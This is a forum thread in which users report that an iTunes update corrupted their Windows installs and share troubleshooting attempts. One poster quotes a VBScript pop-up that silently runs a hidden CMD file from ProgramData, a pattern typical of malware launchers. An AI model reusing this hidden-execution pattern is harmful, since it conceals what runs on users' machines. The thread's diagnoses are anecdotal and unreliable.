Urgent for itunes users



Slant and AFX Guy
Oct 29, 2008
Reaction score
Anthem AZ
An update came out tonite that will ruin your day! do not update to 11.1.14 or as i did as its corrupted from the factory! Just wait until an updated update is released before downloading and installing! good luck
Thanks for the heads up. This is exactly why I never update right away, wait for the bug fixes.

i figured it was my crappy computer as System Mechanic stopped working about a week ago, but there is already dozens of threads about it on Apple within the last 15 minutes.
My new iPhone 5 arrives today. I've had iPods and an iPad but never a phone. I know the last time my iPad updated it took three more updates before the thing straightened out. Apple "genius" my ***.
An update came out tonite that will ruin your day! do not update to 11.1.14 or as i did as its corrupted from the factory! Just wait until an updated update is released before downloading and installing! good luck

Thank you 805moparkid, I just spread the word out to my family I know that
do I-Tunes :coffee2:
I hope all the members do the same :coffee2:
I don't buy anything with an "I" in front of it..it wasn't apple that made the phone good..it was allthe 3rd party companies writing all the apps....you pay to d'load music ???
I don't buy anything with an "I" in front of it..it wasn't apple that made the phone good..it was allthe 3rd party companies writing all the apps....you pay to d'load music ???

nope but ive had an ipod for a very long time! that said i dont have even a smartphone lol

Updated the iTunes on my desktop first and then plugged my brand new iPhone 5 into it and didn't have any trouble?!?
I just did this update... fine for me.

Whats the problem with it?

Registry Errors, when did you update? they may have fixed it already though I re-downloaded it and installed but no change. It seems to depend on what errors you get, some people like myself install and you get a variety of missing .ddl and iTunes wont even open, others install and then open the store at which point it crashes and then back to where I am, third people plug in the phone or pod and it wont recognize it, you restore the phone and then they both go down lol.


Updated the iTunes on my desktop first and then plugged my brand new iPhone 5 into it and didn't have any trouble?!?

did you go to the iTunes store yet?

It got me. corrupted my entire iTunes fill on the computer. Phone is still ok.

sorry to hear... :goodman:
entire computer crashed. It's still out of business. The only thing working correctly in it is solitaire.
To the folks having problems, do you have apple computers as well? Or are you running iTunes on a windows based system on your desktop?
entire computer crashed. It's still out of business. The only thing working correctly in it is solitaire.

Damn! im just having itunes issues

To the folks having problems, do you have apple computers as well? Or are you running iTunes on a windows based system on your desktop?

Windows 8 laptop

Ipod classic 120g
Ok well its going deeper. Not only can i not use itunes but now i can not install anything either. I get a DGBhelp.dll is missing.

you guys have any idea how to reinstall this? i think apple is getting a nasty call today
If I see my Geek squad nephew today (he will be here to watch the super bowl because he has no cable and I will have free food) I will see what he has to help us folks
Thanks, this will help him give us direction of what we need to do and what is not working for you, he is a top tech Geek squad worker at best Buy.
ok currently uninstalling apple, but started getting an insteresting Pop-up. While deleting moble device and something else apple wordpad popped up with gibberish and "shell" and some other stuff. never seen that before only like 3 lines long

set objShell = createobject("WScript.Shell")
objShell.Run "C:\ProgramData\Microsoft\Windows\OFFICEICON.CMD",0
set objShell=Nothing
all uninstalled. going to run registry cleaner and ccleaner then reboot and reinstall
Deleted everything, ran registry cleaners, installed itunes. Finished installing itunes and opened it and!

"Itunes was not installed correctly. Please reinstall itunes.
Error 7 (Windows error 126)"

hit ok and then this popped up again

"The program cant start because dbghelp.dll is missing from your computer. Try reinstalling the program to fix this."

Problem being is ITUNES is whats causing this and not letting me run other programs either...